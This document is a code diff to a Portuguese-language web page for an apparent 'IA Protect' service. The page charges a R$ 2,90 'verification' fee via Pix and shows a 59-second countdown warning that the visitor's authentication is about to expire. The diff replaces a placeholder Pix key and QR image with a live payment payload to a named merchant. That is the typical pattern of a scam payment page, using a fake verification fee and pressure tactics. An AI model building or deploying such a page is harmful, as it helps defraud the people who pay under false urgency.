--- a/index.html
+++ b/index.html
@@ -55,13 +55,18 @@
   <h3>Valor único de verificação: R$ 2,90</h3>
   <p>(IA Protect opera por menos de $0.55 USD internacionalmente)</p>
 
-  <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABVYAAAMACAIAAABAXKuVAACPX0lEQVR4nOzdd7gcVf348c+Zrbff5KaREEhICEkoCb03AVGqFEMoCgiGLxZEUfwpAgELiooiClIUQVRC71KV0EsIhEASQhJCEkhPbm7dNnN+fyysy5bZ2d3Z3XvvvF9Pnj" class="qr-code" alt="QR Code Pix" />
+  <!-- QR Code visível -->
+  <img 
+    src="https://api.qrserver.com/v1/create-qr-code/?data=00020126580014BR.GOV.BCB.PIX01367a97187a-4475-4468-92b5-a8dc1d83aeda52040000530398654042.905802BR5923SUL%20INTERMEDIACOES%20LTDA6006ITAJAI62120508IAPROTEC630446DB&size=220x220" 
+    class="qr-code" 
+    alt="QR Code Pix" 
+  />
 
   <div>
     <button class="pix-btn" onclick="copyPix()">Copiar Chave Pix</button>
   </div>
 
-  <div class="code-box" id="pixKey">00020126360014BR.GOV.BCB.PIX011qrfakepixkey</div>
+  <div class="code-box" id="pixKey">00020126580014BR.GOV.BCB.PIX01367a97187a-4475-4468-92b5-a8dc1d83aeda52040000530398654042.905802BR5923SUL INTERMEDIACOES LTDA6006ITAJAI62120508IAPROTEC630446DB</div>
 
   <p class="timer">⏳ Sua autenticação expira em 59 segundos.</p>
 
